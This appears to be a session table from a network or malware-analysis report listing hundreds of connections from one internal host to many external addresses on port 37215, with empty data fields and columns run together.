                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17227192.168.2.2360420197.89.224.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17228192.168.2.2341280157.177.151.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17229192.168.2.2334322197.219.165.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17230192.168.2.2335024197.181.141.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17231192.168.2.233723441.107.140.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17232192.168.2.235595841.129.215.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17233192.168.2.234468041.166.98.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17234192.168.2.2350960159.252.177.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17235192.168.2.2344800197.245.203.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17236192.168.2.2333026157.55.157.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17237192.168.2.2353460197.119.154.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17238192.168.2.2358932157.174.187.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17239192.168.2.2337660157.228.117.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17240192.168.2.233408641.80.241.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17241192.168.2.2360418157.69.220.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17242192.168.2.2359650157.55.16.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17243192.168.2.2353602197.19.212.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17244192.168.2.234162641.68.75.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17245192.168.2.2352516211.40.213.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17246192.168.2.2358486157.220.167.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17247192.168.2.2345588197.91.146.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17248192.168.2.235390241.0.149.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17249192.168.2.235544641.45.139.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17250192.168.2.233936841.16.63.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17251192.168.2.233668461.147.216.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17252192.168.2.235955841.71.11.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17253192.168.2.2337116157.43.206.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17254192.168.2.233492488.156.245.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17255192.168.2.2344048157.203.1.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17256192.168.2.235683841.77.40.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17257192.168.2.2359908157.204.238.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17258192.168.2.234249441.5.45.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17259192.168.2.2333808173.144.76.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17260192.168.2.234592641.187.178.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17261192.168.2.2359454197.128.217.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17262192.168.2.2335876197.203.94.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17263192.168.2.234413441.161.49.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17264192.168.2.235532441.102.124.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17265192.168.2.2337196117.240.11.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17266192.168.2.236080841.159.154.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17267192.168.2.2345366122.151.162.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17268192.168.2.2345928161.205.81.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17269192.168.2.233766467.77.96.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17270192.168.2.2344282152.48.240.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17271192.168.2.2341186128.153.60.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17272192.168.2.235625241.216.55.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17273192.168.2.235186441.210.11.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17274192.168.2.2359454157.14.251.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17275192.168.2.234417890.28.21.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17276192.168.2.234142441.77.59.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17277192.168.2.235014041.125.189.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17278192.168.2.2358428157.166.161.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17279192.168.2.234326441.75.8.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17280192.168.2.2340712197.12.195.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17281192.168.2.235565450.232.197.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17282192.168.2.2338700197.16.84.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17283192.168.2.2338790197.14.211.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17284192.168.2.2354856197.40.179.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17285192.168.2.2353954197.36.23.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17286192.168.2.2336076157.14.50.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17287192.168.2.2360600197.232.194.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17288192.168.2.2356548186.134.19.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17289192.168.2.235543241.137.70.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17290192.168.2.234879241.187.220.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17291192.168.2.2340582157.87.109.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17292192.168.2.2340108197.250.142.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17293192.168.2.2360234157.243.123.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17294192.168.2.2341644197.61.100.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17295192.168.2.2332814197.98.71.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17296192.168.2.2355748157.112.31.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17297192.168.2.2354302157.113.178.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17298192.168.2.2353216157.204.228.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17299192.168.2.233397641.9.157.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17300192.168.2.2353874157.42.84.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17301192.168.2.2342320157.205.243.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17302192.168.2.2338370197.23.208.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17303192.168.2.235099441.108.185.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17304192.168.2.235118041.53.225.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17305192.168.2.2355184168.93.17.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17306192.168.2.2337744157.101.184.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17307192.168.2.234519044.23.102.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17308192.168.2.234260641.1.65.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17309192.168.2.2352820197.246.173.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17310192.168.2.2338292154.12.117.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17311192.168.2.2338652197.64.91.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17312192.168.2.2349932197.221.54.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17313192.168.2.2354792197.140.186.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17314192.168.2.2354446157.22.31.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17315192.168.2.2344776157.184.19.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17316192.168.2.235106483.212.159.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17317192.168.2.233391841.117.21.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17318192.168.2.2341600157.100.254.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17319192.168.2.2337524157.230.75.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17320192.168.2.233290441.62.58.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17321192.168.2.236035641.94.18.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17322192.168.2.2347392157.24.119.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17323192.168.2.2347606217.169.203.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17324192.168.2.2348492197.208.0.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17325192.168.2.23605508.242.208.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17326192.168.2.2339442157.118.31.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17327192.168.2.2360582157.246.80.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17328192.168.2.2334006157.252.132.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17329192.168.2.2350574221.74.195.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17330192.168.2.234747041.221.252.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17331192.168.2.2357826157.227.167.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17332192.168.2.2355866117.157.110.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17333192.168.2.2336012197.227.239.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17334192.168.2.2357754197.129.95.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17335192.168.2.2350224197.80.162.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17336192.168.2.233599841.79.91.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17337192.168.2.233581241.223.0.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17338192.168.2.2341276157.165.69.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17339192.168.2.2351292197.101.156.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17340192.168.2.2349502197.242.223.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17341192.168.2.2339466157.220.101.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17342192.168.2.2337134197.81.222.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17343192.168.2.234419841.2.24.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17344192.168.2.2336684197.151.10.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17345192.168.2.2342024197.122.40.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17346192.168.2.2351814197.253.32.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17347192.168.2.2358324197.163.128.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17348192.168.2.233886841.245.71.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17349192.168.2.2360734197.183.174.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17350192.168.2.2359330197.161.83.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17351192.168.2.2350578197.179.203.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17352192.168.2.2338328137.54.59.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17353192.168.2.2358110157.5.1.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17354192.168.2.235529641.84.173.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17355192.168.2.2340646100.209.135.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17356192.168.2.2349474197.132.154.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17357192.168.2.2343510197.156.196.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17358192.168.2.235411641.157.44.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17359192.168.2.233649841.119.216.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17360192.168.2.2350670157.44.119.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17361192.168.2.2341806109.68.168.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17362192.168.2.235001641.202.229.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17363192.168.2.235950441.146.62.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17364192.168.2.23581664.175.107.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17365192.168.2.234535890.251.144.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17366192.168.2.2344526157.132.197.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17367192.168.2.2348270196.100.228.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17368192.168.2.233502841.73.30.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17369192.168.2.234036848.106.67.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17370192.168.2.2345958134.249.243.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17371192.168.2.234765276.246.196.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17372192.168.2.2340914197.27.60.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17373192.168.2.2343902157.129.239.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17374192.168.2.235635481.219.68.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17375192.168.2.235226241.50.229.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17376192.168.2.2349728157.242.75.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17377192.168.2.234601041.102.61.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17378192.168.2.2356362157.125.189.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17379192.168.2.233881841.144.44.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17380192.168.2.235212241.84.29.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17381192.168.2.2345966185.145.237.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17382192.168.2.233434841.63.74.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17383192.168.2.2351788157.217.197.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17384192.168.2.234154441.144.206.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17385192.168.2.234152441.220.70.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17386192.168.2.2338768197.10.212.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17387192.168.2.2355062197.192.87.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17388192.168.2.2353596197.58.74.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17389192.168.2.2339502157.107.116.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17390192.168.2.2335664162.74.4.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17391192.168.2.2340410197.31.24.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17392192.168.2.2341270157.41.8.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17393192.168.2.2337958197.124.28.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17394192.168.2.233942841.93.238.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17395192.168.2.2355368157.180.179.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17396192.168.2.2359462197.47.10.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17397192.168.2.234127641.82.50.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17398192.168.2.234736041.185.39.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17399192.168.2.2359194135.34.245.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17400192.168.2.2357166197.215.102.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17401192.168.2.2333548197.185.60.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17402192.168.2.234827241.81.28.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17403192.168.2.2352640157.82.131.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17404192.168.2.2336362157.105.15.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17405192.168.2.2359656157.228.65.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17406192.168.2.234074241.113.82.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17407192.168.2.2346050197.159.71.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17408192.168.2.2334312157.37.229.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17409192.168.2.2338974163.84.148.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17410192.168.2.234945641.217.242.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17411192.168.2.2348976197.54.169.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17412192.168.2.2355390157.207.245.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17413192.168.2.233557284.96.218.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17414192.168.2.2335546197.102.73.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17415192.168.2.2360420157.91.98.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17416192.168.2.234588241.42.86.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17417192.168.2.2338088197.93.107.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17418192.168.2.2344366197.84.194.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17419192.168.2.2346322105.115.162.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17420192.168.2.2352154146.174.167.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17421192.168.2.234428641.10.44.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17422192.168.2.2354688175.156.237.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17423192.168.2.235879639.212.155.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17424192.168.2.2340764197.211.142.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17425192.168.2.2352676134.31.131.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17426192.168.2.235612241.111.226.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17427192.168.2.2360636157.64.207.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17428192.168.2.233669241.49.207.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17429192.168.2.234898258.193.89.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17430192.168.2.2353654157.75.240.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17431192.168.2.2357268157.12.164.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17432192.168.2.2356468157.199.198.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17433192.168.2.2359796111.68.2.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17434192.168.2.2334472213.186.73.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17435192.168.2.2350104157.48.38.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17436192.168.2.2356650197.52.213.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17437192.168.2.236014041.127.5.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17438192.168.2.2335466157.219.118.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17439192.168.2.236061641.162.246.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17440192.168.2.2342442109.37.215.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17441192.168.2.235370441.249.101.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17442192.168.2.2343506157.27.173.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17443192.168.2.2358718197.183.147.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17444192.168.2.2347856157.61.133.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
